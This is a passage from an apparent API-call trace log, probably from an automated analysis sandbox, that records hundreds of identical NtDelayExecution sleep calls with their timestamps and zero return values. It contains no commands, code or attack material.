(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.937] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.417] NtDelayExecution 